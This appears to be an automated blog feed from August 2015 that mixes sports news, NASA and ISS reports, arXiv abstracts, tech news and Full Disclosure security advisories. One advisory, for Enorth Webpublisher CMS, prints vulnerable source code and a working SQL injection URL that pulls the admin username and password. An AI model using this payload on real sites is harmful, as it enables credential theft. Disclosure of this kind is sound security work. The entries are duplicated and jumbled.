Jacek Janiczak · Anonymous Just for fun:) follow me on my fb http://ift.tt/1LeAzoj or check my portfolio www.yaceky.com about 11 hours ago.
from Google Alert - anonymous http://ift.tt/1gLtcai
via IFTTT
Saturday, August 15, 2015
Orioles Highlight: Chris Davis hits 2 HRs, the 2nd a walk-off, in 4-3 win over A's; Davis 34 HR, 15 since All-Star break (ESPN)
from ESPN http://ift.tt/1eW1vUH
via IFTTT
via IFTTT
Ravens: John Harbaugh uses political analogy when talking about training NFL officials, says \"I'm going Trump here\" (ESPN)
from ESPN http://ift.tt/17lH5T2
via IFTTT
via IFTTT
Dortmund, Leicester earn impressive league victories
LONDON (AP) Borussia Dortmund looks to be finding its stride again in the Bundesliga under new coach Thomas Tuchel, while Claudio Ranieri surprisingly has Leicester atop the Premier League standings.
from FOX Sports Digital http://ift.tt/1DTBMim
via IFTTT
from FOX Sports Digital http://ift.tt/1DTBMim
via IFTTT
Casillas keeps clean sheet in debut win for Porto
LISBON, Portugal (AP) Former Real Madrid goalkeeper Iker Casillas kept a clean sheet in his Portuguese league debut on Saturday, when FC Porto beat Guimaraes 3-0 to start its season.
from FOX Sports Digital http://ift.tt/1HOjhqn
via IFTTT
from FOX Sports Digital http://ift.tt/1HOjhqn
via IFTTT
Zenit slips to defeat as CSKA tops Russian table
MOSCOW (AP) Reigning champion Zenit St. Petersburg suffered its first home loss in the Russian Premier League in nine months Saturday, allowing its old rival CSKA Moscow to open up a lead at the top of the table.
from FOX Sports Digital http://ift.tt/1HOjeed
via IFTTT
from FOX Sports Digital http://ift.tt/1HOjeed
via IFTTT
Mexico defender Moreno joins PSV from Espanyol
BARCELONA, Spain (AP) Mexico defender Hector Moreno is joining Dutch club PSV Eindhoven on a transfer from Espanyol.
from FOX Sports Digital http://ift.tt/1DVYohX
via IFTTT
from FOX Sports Digital http://ift.tt/1DVYohX
via IFTTT
Orioles: OF Henry Urrutia recalled from Triple-A (.292, 10 HR, 50 RBI in 107 games); OF Junior Lake optioned to Triple-A (ESPN)
from ESPN http://ift.tt/1eW1vUH
via IFTTT
via IFTTT
Stoke scores 2 late goals, salvages 2-2 draw at Spurs
LONDON (AP) Stoke scored twice in the final 12 minutes to salvage a 2-2 draw at Tottenham in the Premier League on Saturday, keeping both teams without a win after two rounds this season.
from FOX Sports Digital http://ift.tt/1IRuevb
via IFTTT
from FOX Sports Digital http://ift.tt/1IRuevb
via IFTTT
Saint-Etienne concedes late goal in 1-1 draw vs. Bordeaux
PARIS (AP) Saint-Etienne's poor record against Bordeaux continued as it conceded a last minute goal to draw 1-1 in the French league on Saturday.
from FOX Sports Digital http://ift.tt/1TGvYQf
via IFTTT
from FOX Sports Digital http://ift.tt/1TGvYQf
via IFTTT
Promoted Norwich beats Sunderland 3-1 in Premier League
SUNDERLAND, England (AP) Sunderland lost its second straight Premier League game of the season on Saturday, beaten 3-1 by newly promoted Norwich at the Stadium of Light.
from FOX Sports Digital http://ift.tt/1TGfMhH
via IFTTT
from FOX Sports Digital http://ift.tt/1TGfMhH
via IFTTT
Surprising Leicester earns 2nd straight Premier League win
MANCHESTER, England (AP) After being relegation candidates for most of last season, Leicester could be spending more time at the other end of the Premier League table this time around.
from FOX Sports Digital http://ift.tt/1TGfM1m
via IFTTT
from FOX Sports Digital http://ift.tt/1TGfM1m
via IFTTT
Schalke begins Bundesliga with 3-0 win at Werder Bremen
BERLIN (AP) Schalke started its Bundesliga season with a 3-0 victory at Werder Bremen on Saturday while promoted Ingolstadt claimed its first top-level win.
from FOX Sports Digital http://ift.tt/1IRqObI
via IFTTT
from FOX Sports Digital http://ift.tt/1IRqObI
via IFTTT
Spurs sign Njie to bolster striker options
LONDON (AP) Tottenham signed Cameroon striker Clinton Njie from Lyon on a five-year contract on Saturday to fill the gap left by the departure of Roberto Soldado.
from FOX Sports Digital http://ift.tt/1IQTcee
via IFTTT
from FOX Sports Digital http://ift.tt/1IQTcee
via IFTTT
Orioles Highlight: Manny Machado hits walk-off 2-run HR in 13th in 8-6 win over A's; Adam Jones 3-run HR, Chris Davis HR (ESPN)
from ESPN http://ift.tt/1eW1vUH
via IFTTT
via IFTTT
Comet Dust over Enchanted Rock
Dusty debris from periodic Comet Swift-Tuttle was swept up by planet Earth this week. Vaporized by their passage through the dense atmosphere at 59 kilometers per second, the tiny grains produced a stream of Perseid meteors. A bright, colorful Perseid meteor flash was captured during this 20 second exposure. It made its ephemeral appearance after midnight on August 12, in the moonless skies over the broad granite dome of Enchanted Rock State Natural Area, central Texas, USA. Below the Perseid meteor, trees stand in silhouette against scattered lights along the horizon and the faint Milky Way, itself cut by dark clouds of interstellar dust. via NASA http://ift.tt/1JWDAI4
Friday, August 14, 2015
The Merry Andrew by Anonymous
Project Gutenberg · 49,631 free ebooks · 732 by Anonymous. The Merry Andrew by Anonymous. Book Cover. Download; Bibrec ...
from Google Alert - anonymous http://ift.tt/1IPuXwN
via IFTTT
from Google Alert - anonymous http://ift.tt/1IPuXwN
via IFTTT
[FD] ERPSCAN Research Advisory [ERPSCAN-15-012] SAP Afaria 7 XComms – Buffer Overflow
Application: SAP Afaria 7 Versions Affected: SAP Afaria 7, probably others Vendor URL: http://SAP.com Bugs: Buffer Overflow Sent: 13.03.2015 Reported: 14.03.2015 Vendor response: 14.03.2015 Date of Public Advisory: 18.05.2015 Reference: SAP Security Note 2153690 Author: Dmitry Chastukhin (ERPScan) Description 1. ADVISORY INFORMATION Title: SAP Afaria 7 Advisory ID: [ERPSCAN-15-012] Risk: High Advisory URL: http://ift.tt/1DTMDsa Date published: 18.05.2015 Vendors contacted: SAP 2. VULNERABILITY INFORMATION Class: XML External Entity [CWE-121] Impact: Information disclosure, DoS Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2015-4092 3. VULNERABILITY DESCRIPTION 1) Buffer Overflow: A vulnerability has been discovered in certain landscape configurations of SAP Afaria that utilize XComms for client-to-server communications. XComms is only used for Android, Windows Mobile, and Win32 clients. 2) Information Disclosure: An encrypted password is left in the file system that is not needed for server operation. (CVSS Score: 1.9, LMN|PNN) 3) Denial of Service (DoS): An attacker can remotely exploit the SAP Afaria Package Server, rendering it, and potentially the resources utilized by the Afaria server, unavailable. (CVSS Score: 7.8, NLN|NNC) 4. VULNERABLE PACKAGES SAP Afaria 7 Other versions are probably affected too, but they were not checked. 5. SOLUTIONS AND WORKAROUNDS Multiple vulnerabilities have been discovered in certain landscape configurations of SAP Afaria. SAP has released a security patch to address the vulnerabilities. SAP strongly recommends that customers update their landscapes. Patch Instructions: 1) Download hotfix. - SAP Afaria 7 SP5: Download Hotfix 11 2) Apply server hotfix (SAP Security Note 2153690) SAP takes any security-related reports very seriously, and we will notify our customers as relevant new information on this topic becomes available. Customers may also contact SAP support by raising a customer incident on the component MOB-AFA. 6. AUTHOR Dmitry Chastukhin (ERPScan) 7. TECHNICAL DESCRIPTION An attacker can generate and send a special request to the server to exploit a buffer overflow vulnerability. 8. REPORT TIMELINE Sent: 13.03.2015 Reported: 14.03.2015 Vendor response: 14.03.2015 Date of Public Advisory: 18.05.2015 9. REFERENCES http://ift.tt/1DTMDsa 10. ABOUT ERPScan Research The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few. We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research. 11. ABOUT ERPScan ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale. Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort. We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support. Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA, 94301 Phone: 650.798.5255 Twitter: @erpscan Scoop-it: Business Application Security http://erpscan.com
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
Bilbao routs Barcelona 4-0 in 1st leg of Spanish Super Cup
BILBAO, Spain (AP) Athletic Bilbao roared to a stunning 4-0 victory over Barcelona in the first leg of the Spanish Super Cup after striker Aritz Aduriz picked apart the European champions with a second-half hat trick on Friday.
from FOX Sports Digital http://ift.tt/1IRyx7A
via IFTTT
from FOX Sports Digital http://ift.tt/1IRyx7A
via IFTTT
Bayern kicks off season with 5-0 win over Hamburg
FRANKFURT, Germany (AP) Bayern Munich kicked off its bid for an unprecedented fourth straight Bundesliga title by cruising past hapless Hamburger SV 5-0 on Friday.
from FOX Sports Digital http://ift.tt/1hCWDfv
via IFTTT
from FOX Sports Digital http://ift.tt/1hCWDfv
via IFTTT
Monaco held to goalless draw by Lille in French league
MONACO (AP) A superb performance from Lille goalkeeper Vincent Enyeama held Monaco to a goalless draw at home in the French league on Friday.
from FOX Sports Digital http://ift.tt/1N8dtzS
via IFTTT
from FOX Sports Digital http://ift.tt/1N8dtzS
via IFTTT
FIFA bribery suspect agrees his extradition to Nicaragua
BERN, Switzerland (AP) Switzerland's justice ministry says it has approved the extradition of FIFA bribery case suspect Julio Rocha to Nicaragua.
from FOX Sports Digital http://ift.tt/1Lcksrj
via IFTTT
from FOX Sports Digital http://ift.tt/1Lcksrj
via IFTTT
Prosecutor seeks extradition of more FIFA defendants
NEW YORK (AP) A U.S. prosecutor says his office is in extradition negotiations with lawyers of defendants in the FIFA (FEE'-fuh) bribery soccer probe.
from FOX Sports Digital http://ift.tt/1Lc8gqu
via IFTTT
from FOX Sports Digital http://ift.tt/1Lc8gqu
via IFTTT
Newcomer Buerki picked over veteran Weidenfeller in Dortmund
DORTMUND, Germany (AP) Newcomer Roman Buerki has been picked over veteran Roman Weidenfeller as Borussia Dortmund's starting goalkeeper in the Bundesliga.
from FOX Sports Digital http://ift.tt/1JXbyfA
via IFTTT
from FOX Sports Digital http://ift.tt/1JXbyfA
via IFTTT
Bundesliga newcomer Darmstadt signs defender Gyoergy Garics
DARMSTADT, Germany (AP) Promoted Darmstadt says it has signed Austria defender Gyoergy Garics, one day before the club marks its return to the Bundesliga after 33 years.
from FOX Sports Digital http://ift.tt/1Wp9bXT
via IFTTT
from FOX Sports Digital http://ift.tt/1Wp9bXT
via IFTTT
Swiss players banned for cash to team that beat league rival
BERN, Switzerland (AP) Two Swiss top-tier players have been suspended for 12 matches over illegal payments to another team in last season's promotion chase.
from FOX Sports Digital http://ift.tt/1J8kNJ2
via IFTTT
from FOX Sports Digital http://ift.tt/1J8kNJ2
via IFTTT
ISS Daily Summary Report – 08/13/15
HRP Operations: Kelly completed his last Journals session for the week. Yui completed his Flight Day 15 (FD15) VO2 Max Session, and with Kelly’s assistance, stowed the equipment. Journals obtains information on behavioral and human issues that are relevant to the design of equipment and procedures and sustained human performance during extended-duration missions. The Sprint investigation evaluates the use of high intensity, low volume exercise training to minimize loss of muscle, bone, and cardiovascular function in ISS crewmembers during long-duration missions. Synchronized Position Hold, Engage, Reorient, Experimental Satellites (SPHERES) Zero Robotics Dry Run: Kononenko and Yui performed a session of this experiment. The SPHERES Zero Robotics investigation establishes an opportunity for high school students to design research for the ISS. As part of a competition, students write algorithms for the SPHERES satellites to accomplish tasks relevant to future space missions. The algorithms are tested by the SPHERES team and the best designs are selected for the competition to operate the SPHERES satellites on board the ISS. Space Headaches: Yui and Lindgren completed their weekly Space Headaches questionnaire. Headaches can be a common complaint during spaceflight. The Space Headaches experiment improves the understanding of such conditions, which helps in the development of methods to alleviate associated symptoms, and improve the well-being and performance of crew members in orbit. This can also improve the knowledge of similar conditions on Earth. Alpha Magnetic Spectrometer-02 (AMS-02) Hard Drive Swap: Lindgren completed a regular hard drive swap on the AMS Laptop. The AMS-02 looks for evidence of dark energy and dark matter, along with very high-energy radiation coming from distant stars that could harm crewmembers traveling to Mars. AMS-02 has collected and analyzed billions of cosmic ray events and identified 9 million of these as electrons or positrons (antimatter). The number of high energy positons increases steadily rather than decaying, conflicting with theoretical models, and indicates a yet to be identified source of positrons. Researchers also observed a plateau in the positron growth curve and need additional data to determine why. Results suggest that high-energy positrons and cosmic ray electrons may come from different and mysterious sources. Solving the origin of cosmic rays and antimatter increases understanding of our galaxy. AAA Inlet Flow Measurements in OGS, Water Recovery System (WRS)1 Racks: Following last week’s low Velocicalc reading of the air flow rate into the OGS Rack AAA inlet, on Tuesday the crew cleaned the OGS AAA. Today the crew performed new Velocicalc measurements to confirm the flow rate after the cleaning. Results from the OGS Rack AAA inlet readings are now within acceptable limits. The crew also took measurements of the air flow rate going into the WRS-1 Rack AAA Inlet. The WRS-1 air flow rate is lower than expected, ground teams are evaluating the data to determine if any additional actions are required. Water Recovery System (WRS) Separator Plumbing Assembly (SPA) Vent Line Build: For several months, ground teams have suspected the SPA vent hose is restricted due to microbial growth. There is no microbial control in the purge lines and no designated way to clean them if growth occurs. Since there are no spare SPA vent hose onboard, earlier this week Kelly built an alternate SPA Vent Line by removing the end fittings from an existing Iodine Removal Hose. Today he installed this hose to eliminate the restriction and return the Urine Processing Assembly (UPA) to nominal operations. Internal Thermal Control System (ITCS) Sample Collection: Lindgren conducted ITCS fluid sampling from N2 Low Temperature Loop (LTL) and N3 sample ports. This maintenance is performed periodically to monitor the quality of the water in the ITCS loops. Mobile Serving System (MSS) Operations: Today, the Robotics Ground Controllers powered up the MSS in preparation for the HTV5 Offset Grapples Practice Session. Kelly, Lindgren and Yui practiced maneuvering the Space Station Remote Manipulator System (SSRMS) into the grapple envelope of the Special Purpose Dexterous Manipulator (SPDM) Power Data Grapple Fixture (PDGF). They performed this several times and then performed a run during which the Robotics Ground Controllers safed the SSRMS to simulate a failure. The crew recovered by switching from the Cupola Robotic Workstation (RWS) to the Lab RWS and backed the SSRMS away. The crew then returned to the Cupola RWS and performed three more runs (without safing). After the Offset Grapples Practice session, the Robotics Ground Controllers reconfigured the MSS for nominal operations and maneuvered the SSRMS to the HTV5 High Hover position ready for HTV5 Dragon capture on 20 August 2015. MSS performance today was nominal. Today’s Planned Activities All activities were completed unless otherwise noted. Calf Volume Measurement / r/g 9603 CONSTANTA-2 r/g 9596 Water Recovery System (WRS) – Separator Plumbing Assembly (SPA) Vent Line R&R AMS – Historical Photography AMS – Hard Drive Exchange Docking mechanism removal and installation of two hatch tools on DC1 external hatch cover r/g 9602 [Aborted] SPRINT – Hardware Setup CONSTANTA-2. Prep and Execute Session 5 Run / r/g 9596 Removal of Portable Repress Tank in SM [РО] and stowage SPHERES – Experiment OBT Study of veins in lower extremities / r/g 9604 SPHERES – Science Operations Conference SPHERES – Payload Conference SPHERES – Experiment Hardware Setup SPHERES – Hardware Setup and Checkout ITCS Low Temperature Loop Sampling in the LAB Terminate the 1st Orlan-MK 825М3 Battery Pack discharge No.1267271171 Orlan-MK Equipment Pre-pack for Stowage and Disposal after EVA / r/g 9587 Node 2 – Low Temperature Loop (LTL) – Internal Thermal Control System (ITCS) – Sample Collection SPRINT – Experiment Ops EVA Tool Stowage, IMS Ops. Window Cleaner Ops. Test Sealed Unit Ops / r/g 9606 WRS – Recycle Tank Fill HABIT – Hardware activation [Deferred] PAO Event HMS – Food Frequency Questionnaire WRS – Recycle Tank Fill EVA Tool Stowage, IMS Ops Window cleaner ops. Test Sealed Unit Ops / r/g 9606 SPHERES – Hardware Installation and Test SPRINT – Payload Closeout Ops WRS – Recycle Tank Fill SHD – Weekly Questionnaire RWS – Hardware […]
from ISS On-Orbit Status Report http://ift.tt/1hC5z4Y
via IFTTT
from ISS On-Orbit Status Report http://ift.tt/1hC5z4Y
via IFTTT
Facebook Fired An Intern After He Exposes How to Track Users' Location
Previously, we posted about a privacy issue in Facebook messenger; Aran Khanna, a Harvard University student, discovered ‘A Marauder’s Map’ that could sense and give the geolocations of your friends on the messenger. Khanna had received an opportunity to work as an intern for Facebook… …But destiny had planned something else for him, as after publicly stating the risk associated with
from The Hacker News http://ift.tt/1Kln8wN
via IFTTT
from The Hacker News http://ift.tt/1Kln8wN
via IFTTT
I have a new follower on Twitter
Upol Ehsan
Lead, #Research & Development ♦ Philosopher of Mind ♦ #Social #entrepreneur ♦ Futurist ♦ #InternetOfThngs and Open #innovation advocate ♦ @manUnited fan
http://t.co/YlAzioxwqX
Following: 2801 - Followers: 3389
August 14, 2015 at 08:03AM via Twitter http://twitter.com/UpolEhsan
French league relegation spots kept to 3 after court ruling
PARIS (AP) France's highest administrative court has provisionally upheld the national football federation's decision to keep the number of teams relegated from the top league to three.
from FOX Sports Digital http://ift.tt/1ErmPPg
via IFTTT
from FOX Sports Digital http://ift.tt/1ErmPPg
via IFTTT
Barcelona sends reserve player Adama Traore to Aston Villa
BARCELONA, Spain (AP) Barcelona has agreed to send reserve team player Adama Traore to English club Aston Villa.
from FOX Sports Digital http://ift.tt/1ErghQG
via IFTTT
from FOX Sports Digital http://ift.tt/1ErghQG
via IFTTT
Ransomware Attacks Threaten Wearable Devices and Internet of Things
Are you a proud owner of a Smartwatch, a Smart TV, a Smart fridge, a Smart lock, an Internet-enabled car, or live in a smart city? Caution! Recently, it has been reported that the growth of the Internet of Things would eventually lead to cyber criminals in making lots of money, as they started attacking the Internet of Things for Ransom. Yes, the latest Interest of the cyber
from The Hacker News http://ift.tt/1N72Tcg
via IFTTT
from The Hacker News http://ift.tt/1N72Tcg
via IFTTT
Leipzig given 2-0 German Cup win after lighter hits referee
BERLIN (AP) A German football federation tribunal has awarded second-division team RB Leipzig a 2-0 win over third-tier club Osnabrueck in a German Cup match against after the referee was hit on the head by a lighter during the match and the game was abandoned.
from FOX Sports Digital http://ift.tt/1h9lM1s
via IFTTT
from FOX Sports Digital http://ift.tt/1h9lM1s
via IFTTT
I have a new follower on Twitter
Max Foundry
We build and develop the awesome WordPress Button Plugin http://t.co/jWWuwPeoJn, WordPress Gallery Platform http://t.co/0cH2HebgC2 and http://t.co/9opivbIdKU
Columbus & San Francisco
http://t.co/dEwhk3iuKQ
Following: 817 - Followers: 4458
August 14, 2015 at 05:45AM via Twitter http://twitter.com/maxfoundry
Windows 10 Doesn't Stop Spying You, Even After Disabling It's Creepy Features
In our previous articles, we raised concern about Windows 10 privacy issues, including its controversial Wi-Fi Sense feature. Also, to cope up with these issues, I provided you a one-click solution to fix all privacy compromising features that allow Microsoft to track users. But unfortunately, all those efforts got wasted because Microsoft still tracks you, even after you harden your
from The Hacker News http://ift.tt/1TzF2q0
via IFTTT
from The Hacker News http://ift.tt/1TzF2q0
via IFTTT
I have a new follower on Twitter
RSIP Vision
We provide cutting-edge image processing & computer vision R&D. Follow us for pixel & nerd news. @dr_felicityp tweets.For more detail please check out our site!
Worldwide
http://t.co/TW6nYc7VYM
Following: 889 - Followers: 835
August 14, 2015 at 01:04AM via Twitter http://twitter.com/RSIPvision
Moonless Meteors and the Milky Way
Have you watched the Perseid meteor shower? Though the annual shower's predicted peak was last night, meteor activity should continue tonight (August 13/14), best enjoyed by just looking up in clear, dark skies after midnight. Of course, this year's Perseid shower has the advantage of being active near the August 14 New Moon. Since the nearly New Moon doesn't rise before the morning twilight many fainter meteors are easier to spot until then, with no interference from bright moonlight. The Perseid meteor shower last occurred near a New Moon in 2013. That's when the exposures used to construct this image were made, under dark, moonless skies from Hvar Island off the coast of Croatia. The widefield composite includes 67 meteors streaming from the heroic constellation Perseus, the shower's radiant, captured during 2013 August 8-14 against a background of faint zodiacal light and the Milky Way. The next moonless Perseid meteor shower will be in August 2018. via NASA http://ift.tt/1JV4IHC
Thursday, August 13, 2015
Ravens: QB Joe Flacco nearly perfect, rookie DL Carl Davis impresses in preseason opener, writes Jamison Hensley (ESPN)
from ESPN http://ift.tt/17lH5T2
via IFTTT
via IFTTT
Offerte su Amazon (@legrandiofferte) favorited one of your Tweets!
@mistermcguire: [FD] APPLE-SA-2015-08-13-3 iOS Offerte su Amazon favorited your Tweet. View Patrick McGuire @mistermcguire = [FD] APPLE-SA-2015-08-13-3 iOS 8.4.1 ift.tt/1DRzf83 Settings | Help | Opt-out | Download app Twitter, Inc. 1355 Market Street, Suite 900 San Francisco, CA 94103
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
Overeaters Anonymous
Overeaters Anonymous is a group of women and. men. who use the Twelve Steps of Alcoholics. Anonymous. to. recover from compulsive eating and ...
from Google Alert - anonymous http://ift.tt/1faQCF6
via IFTTT
from Google Alert - anonymous http://ift.tt/1faQCF6
via IFTTT
Multiple-Path Selection for new Highway Alignments using Discrete Algorithms. (arXiv:1508.03064v1 [cs.DS])
This paper addresses the problem of finding multiple near-optimal, spatially-dissimilar paths that can be considered as alternatives in the decision making process, for finding optimal corridors in which to construct a new road. We further consider combinations of techniques for reducing the costs associated with the computation and increasing the accuracy of the cost formulation. Numerical results for five algorithms to solve the dissimilar multipath problem show that a "bidirectional approach" yields the fastest running times and the most robust algorithm. Further modifications of the algorithms to reduce the running time were tested and it is shown that running time can be reduced by an average of 56 percent without compromising the quality of the results.
from cs.AI updates on arXiv.org http://ift.tt/1h8c5QW
via IFTTT
Generation of Multimedia Artifacts: An Extractive Summarization-based Approach. (arXiv:1508.03170v1 [cs.AI])
We explore methods for content selection and address the issue of coherence in the context of the generation of multimedia artifacts. We use audio and video to present two case studies: generation of film tributes, and lecture-driven science talks. For content selection, we use centrality-based and diversity-based summarization, along with topic analysis. To establish coherence, we use the emotional content of music, for film tributes, and ensure topic similarity between lectures and documentaries, for science talks. Composition techniques for the production of multimedia artifacts are addressed as a means of organizing content, in order to improve coherence. We discuss our results considering the above aspects.
from cs.AI updates on arXiv.org http://ift.tt/1hAv7PT
via IFTTT
Talking about the Moving Image: A Declarative Model for Image Schema Based Embodied Perception Grounding and Language Generation. (arXiv:1508.03276v1 [cs.AI])
We present a general theory and corresponding declarative model for the embodied grounding and natural language based analytical summarisation of dynamic visuo-spatial imagery. The declarative model ---ecompassing spatio-linguistic abstractions, image schemas, and a spatio-temporal feature based language generator--- is modularly implemented within Constraint Logic Programming (CLP). The implemented model is such that primitives of the theory, e.g., pertaining to space and motion, image schemata, are available as first-class objects with `deep semantics' suited for inference and query. We demonstrate the model with select examples broadly motivated by areas such as film, design, geography, smart environments where analytical natural language based externalisations of the moving image are central from the viewpoint of human interaction, evidence-based qualitative analysis, and sensemaking.
Keywords: moving image, visual semantics and embodiment, visuo-spatial cognition and computation, cognitive vision, computational models of narrative, declarative spatial reasoning
from cs.AI updates on arXiv.org http://ift.tt/1L9LVac
via IFTTT
Joint Optimization of Masks and Deep Recurrent Neural Networks for Monaural Source Separation. (arXiv:1502.04149v3 [cs.SD] UPDATED)
Monaural source separation is important for many real world applications. It is challenging because, with only a single channel of information available, without any constraints, an infinite number of solutions are possible. In this paper, we explore joint optimization of masking functions and deep recurrent neural networks for monaural source separation tasks, including monaural speech separation, monaural singing voice separation, and speech denoising. The joint optimization of the deep recurrent neural networks with an extra masking layer enforces a reconstruction constraint. Moreover, we explore a discriminative criterion for training neural networks to further enhance the separation performance. We evaluate the proposed system on the TSP, MIR-1K, and TIMIT datasets for speech separation, singing voice separation, and speech denoising tasks, respectively. Our approaches achieve 2.30--4.98 dB SDR gain compared to NMF models in the speech separation task, 2.30--2.48 dB GNSDR gain and 4.32--5.42 dB GSIR gain compared to existing models in the singing voice separation task, and outperform NMF and DNN baselines in the speech denoising task.
from cs.AI updates on arXiv.org http://ift.tt/1BhZEJR
via IFTTT
[FD] [CVE-2015-5617]Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp cbNewsid
Title: ==== [CVE-2015-5617]Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp cbNewsid Vendor: ====== http://ift.tt/1L9CmYU Enorth Webpublisher CMS so far of the scale of tens of thousands of web sites, with the government, enterprises, scientific research and education and media industries fields such as nearly thousands of business users. Versions Affected: ============== All versions Author: ====== xin.wang(xin.wang(at)dbappsecurity.com.cn) Vulnerability Description: ==================== /pub/m_pending_news/delete_pending_news.jsp <%
String[] newsIdGroup;
newsIdGroup = request.getParameterValues("cbNewsId");
if (newsIdGroup == null || newsIdGroup.length == 0) {
throw new P3Exception("mbx_news_submit_empty_news_id");
} else {
penTran.deletePendingNews(newsIdGroup);
}
%> /WEB-INF/classes/cn/com/enorth/pub3/m_news/PendingNewsBean.class public void deletePendingNews(String[] newsIds) throws Exception { Connection cn = null; PreparedStatement pstm = null; try { StringBuffer buf = new StringBuffer(); buf.append("delete from tn_pending_news where news_id in ("); int i = 0; for (int len = newsIds.length; i < len; i++) { buf.append(newsIds[i]).append(","); } buf.append("-1)"); cn = P3DBTools.getPubConnection(); pstm = cn.prepareStatement(buf.toString()); pstm.executeUpdate();//执行 cn.commit(); } catch (Exception ex) { P3DBTools.rollback(cn); throw ex; } finally { P3DBTools.freeConnection(cn); } } } Exploit: ====== http://ift.tt/1Nep8MO)%20and%201=ctxsys.drithsx.sn(1,(select%20USER_NAME||PASS_WORD%20from%20TN_USER%20WHERE%20USER_ID=1))— Vulnerability Disclosure Timeline: =========================== 2015-07-28 Found The Vulnerability 2015-08-02 Submitted To The Vendor 2015-08-03 Fixed 2015-08-13 Public Disclosure ================================================================================================
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] BFS-SA-2015-002: OpenSSH PAM Privilege Separation Vulnerabilities
Blue Frost Security GmbH http://ift.tt/1IH5eGS research(at)bluefrostsecurity.de BFS-SA-2015-002 13-August-2015
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] APPLE-SA-2015-08-13-4 OS X Server v4.1.5
-----BEGIN PGP SIGNED MESSAGE-
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] APPLE-SA-2015-08-13-3 iOS 8.4.1
-----BEGIN PGP SIGNED MESSAGE-
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update 2015-006
-----BEGIN PGP SIGNED MESSAGE-
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
[FD] APPLE-SA-2015-08-13-1 Safari 8.0.8, Safari 7.1.8, and Safari 6.2.8
Source: Gmail -> IFTTT-> Blogger
Real Salt Lake signs forward Juan Manuel Martinez
SALT LAKE CITY (AP) Real Salt Lake has signed Argentinian forward Juan Manuel Martinez as a designated player.
from FOX Sports Digital http://ift.tt/1JfUNgU
via IFTTT
from FOX Sports Digital http://ift.tt/1JfUNgU
via IFTTT
Max Foundry (@maxfoundry) favorited one of your Tweets!
@mistermcguire: Re: [FD] Stored XSS in Google Analytics by Yoast Premium allows privileged users to attack other users (WordPress … Max Foundry favorited your Tweet. View Patrick McGuire @mistermcguire = Re: [FD] Stored XSS in Google Analytics by Yoast Premium allows privileged users to attack other users (WordPress … ift.tt/1TuP46l Settings | Help | Opt-out | Download app Twitter, Inc. 1355 Market Street, Suite 900 San Francisco, CA 94103
Source: Gmail -> IFTTT-> Blogger
Source: Gmail -> IFTTT-> Blogger
Change this Facebook Privacy Setting That Could Allow Hackers to Steal Your Identity
Facebook User: Who Can Find Me...? Hacker: Yes, I CAN!! A Security Researcher claimed “digi-crims could easily scan the population of an entire country to find targets”. Reza Moaiandin, technical director at Salt Agency, has figured out a way to exploit an important Facebook feature to gather personal data belonging to the users. Facebook Privacy Setting That Makes Your Identity
from The Hacker News http://ift.tt/1gEm9jE
via IFTTT
from The Hacker News http://ift.tt/1gEm9jE
via IFTTT
Is AA Right for You?
Do you think you have a problem with alcohol? New to AA? Think you have a problem? Call the Chicago Area Service Office and ask for help: ...
from Google Alert - anonymous http://ift.tt/1J2F52i
via IFTTT
from Google Alert - anonymous http://ift.tt/1J2F52i
via IFTTT
Blatter urges European soccer to revive his '6 plus 5' rule
ZURICH (AP) FIFA President Sepp Blatter has asked western Europe for ''a little good will'' to follow Russia and limit foreign players in club lineups.
from FOX Sports Digital http://ift.tt/1IKQiYc
via IFTTT
from FOX Sports Digital http://ift.tt/1IKQiYc
via IFTTT
2 clubs in top Czech league fined for anti-Islam posters
PRAGUE (AP) Two clubs in the top Czech division have been fined by the country's football federation for anti-Islam messages held up by their fans.
